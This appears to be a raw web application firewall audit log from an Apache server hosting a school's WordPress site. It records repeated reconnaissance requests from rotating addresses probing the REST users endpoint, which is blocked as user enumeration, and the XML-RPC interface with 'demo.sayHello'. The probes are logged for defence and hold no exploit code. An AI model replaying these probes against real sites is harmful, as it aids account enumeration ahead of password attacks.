Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48c0ef20-Z-- --dbba3235-A-- [17/May/2025:10:30:51 +0700] aCgC63yxdQCiyU1ENFcrkwAAAAI 103.236.140.4 50970 103.236.140.4 8181 --dbba3235-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.174.233 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.174.233 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dbba3235-C-- demo.sayHello --dbba3235-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dbba3235-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747452651087679 5020 (- - -) Stopwatch2: 1747452651087679 5020; combined=3775, p1=463, p2=3109, p3=27, p4=27, p5=88, sr=70, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dbba3235-Z-- --e02cbf17-A-- [17/May/2025:10:32:32 +0700] aCgDUBKi5m5upc8uMd6jiQAAAM4 103.236.140.4 50974 103.236.140.4 8181 --e02cbf17-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.192 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e02cbf17-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e02cbf17-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747452752048266 3089 (- - -) Stopwatch2: 1747452752048266 3089; combined=1294, p1=435, p2=825, p3=0, p4=0, p5=34, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e02cbf17-Z-- --f1167c1a-A-- [17/May/2025:10:32:38 +0700] aCgDVhKi5m5upc8uMd6jiwAAANE 103.236.140.4 50978 103.236.140.4 8181 --f1167c1a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.192 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f1167c1a-C-- demo.sayHello --f1167c1a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1167c1a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747452758812687 5341 (- - -) Stopwatch2: 1747452758812687 5341; combined=4066, p1=520, p2=3329, p3=28, p4=34, p5=92, sr=71, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1167c1a-Z-- --5ee8c378-A-- [17/May/2025:10:32:55 +0700] aCgDZxKi5m5upc8uMd6jjQAAANQ 103.236.140.4 50984 103.236.140.4 8181 --5ee8c378-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.164 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.164 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5ee8c378-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ee8c378-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747452775877624 3064 (- - -) Stopwatch2: 1747452775877624 3064; combined=1326, p1=473, p2=817, p3=0, p4=0, p5=35, sr=119, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ee8c378-Z-- --439c7729-A-- [17/May/2025:10:33:02 +0700] aCgDbgTOsBn9MSWb6WJwIwAAAJM 103.236.140.4 50988 103.236.140.4 8181 --439c7729-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.164 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.164 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --439c7729-C-- demo.sayHello --439c7729-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --439c7729-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747452782271609 5724 (- - -) Stopwatch2: 1747452782271609 5724; combined=4190, p1=528, p2=3437, p3=36, p4=34, p5=92, sr=73, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --439c7729-Z-- --2a42870c-A-- [17/May/2025:10:33:12 +0700] aCgDeOm4kjNN-hEbWjJDVQAAAEQ 103.236.140.4 51000 103.236.140.4 8181 --2a42870c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.167.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.167.171 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2a42870c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a42870c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747452792301933 2316 (- - -) Stopwatch2: 1747452792301933 2316; combined=1147, p1=388, p2=734, p3=0, p4=0, p5=25, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a42870c-Z-- --beb20d77-A-- [17/May/2025:10:33:18 +0700] aCgDfhKi5m5upc8uMd6jkgAAAMM 103.236.140.4 51008 103.236.140.4 8181 --beb20d77-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.167.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.167.171 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --beb20d77-C-- demo.sayHello --beb20d77-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --beb20d77-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747452798493083 4798 (- - -) Stopwatch2: 1747452798493083 4798; combined=3706, p1=484, p2=3027, p3=23, p4=24, p5=87, sr=66, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --beb20d77-Z-- --14d43b3e-A-- [17/May/2025:10:34:15 +0700] aCgDt3yxdQCiyU1ENFcrlgAAAAk 103.236.140.4 51014 103.236.140.4 8181 --14d43b3e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.125.244 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.125.244 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --14d43b3e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --14d43b3e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747452855193861 2843 (- - -) Stopwatch2: 1747452855193861 2843; combined=1232, p1=440, p2=762, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --14d43b3e-Z-- --fdc63b2e-A-- [17/May/2025:10:34:23 +0700] aCgDv3yxdQCiyU1ENFcrmQAAABE 103.236.140.4 51020 103.236.140.4 8181 --fdc63b2e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.125.244 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.125.244 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fdc63b2e-C-- demo.sayHello --fdc63b2e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fdc63b2e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747452863654495 5835 (- - -) Stopwatch2: 1747452863654495 5835; combined=4320, p1=536, p2=3562, p3=31, p4=35, p5=93, sr=78, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fdc63b2e-Z-- --9c18881b-A-- [17/May/2025:10:38:19 +0700] aCgEq3yxdQCiyU1ENFcrnAAAABY 103.236.140.4 51034 103.236.140.4 8181 --9c18881b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.110.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.110.238 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9c18881b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c18881b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747453099829035 3280 (- - -) Stopwatch2: 1747453099829035 3280; combined=1438, p1=509, p2=896, p3=0, p4=0, p5=33, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c18881b-Z-- --a60b746a-A-- [17/May/2025:10:38:25 +0700] aCgEsRKi5m5upc8uMd6jlAAAAMc 103.236.140.4 51038 103.236.140.4 8181 --a60b746a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.110.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.110.238 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a60b746a-C-- demo.sayHello --a60b746a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a60b746a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747453105277748 6382 (- - -) Stopwatch2: 1747453105277748 6382; combined=4616, p1=617, p2=3762, p3=38, p4=43, p5=94, sr=81, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a60b746a-Z-- --37101972-A-- [17/May/2025:10:40:00 +0700] aCgFEBKi5m5upc8uMd6jlQAAAMg 103.236.140.4 51046 103.236.140.4 8181 --37101972-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.43.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.43.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --37101972-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --37101972-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747453200847538 2789 (- - -) Stopwatch2: 1747453200847538 2789; combined=1250, p1=438, p2=782, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --37101972-Z-- --844dc410-A-- [17/May/2025:10:40:06 +0700] aCgFFnyxdQCiyU1ENFcroQAAAAU 103.236.140.4 51054 103.236.140.4 8181 --844dc410-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.43.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.43.232 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --844dc410-C-- demo.sayHello --844dc410-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --844dc410-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747453206725319 5133 (- - -) Stopwatch2: 1747453206725319 5133; combined=4110, p1=492, p2=3401, p3=30, p4=34, p5=91, sr=71, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --844dc410-Z-- --6a495733-A-- [17/May/2025:10:40:52 +0700] aCgFRBKi5m5upc8uMd6jmAAAAMw 103.236.140.4 51062 103.236.140.4 8181 --6a495733-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.46 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6a495733-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a495733-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747453252762344 2798 (- - -) Stopwatch2: 1747453252762344 2798; combined=1244, p1=424, p2=789, p3=0, p4=0, p5=31, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a495733-Z-- --bb0d3a58-A-- [17/May/2025:10:41:00 +0700] aCgFTHyxdQCiyU1ENFcrogAAAAg 103.236.140.4 51066 103.236.140.4 8181 --bb0d3a58-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.46 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bb0d3a58-C-- demo.sayHello --bb0d3a58-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb0d3a58-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747453260343085 5984 (- - -) Stopwatch2: 1747453260343085 5984; combined=4395, p1=586, p2=3583, p3=32, p4=36, p5=94, sr=79, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb0d3a58-Z-- --b1900528-A-- [17/May/2025:10:41:42 +0700] aCgFdnyxdQCiyU1ENFcrpAAAAAs 103.236.140.4 51072 103.236.140.4 8181 --b1900528-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.183.86 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.183.86 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b1900528-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b1900528-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747453302344270 15434 (- - -) Stopwatch2: 1747453302344270 15434; combined=26013, p1=422, p2=870, p3=0, p4=0, p5=12378, sr=73, sw=0, l=0, gc=12343 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1900528-Z-- --cd595757-A-- [17/May/2025:10:41:50 +0700] aCgFfnyxdQCiyU1ENFcrpgAAABE 103.236.140.4 51076 103.236.140.4 8181 --cd595757-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.183.86 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.183.86 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cd595757-C-- demo.sayHello --cd595757-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cd595757-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s 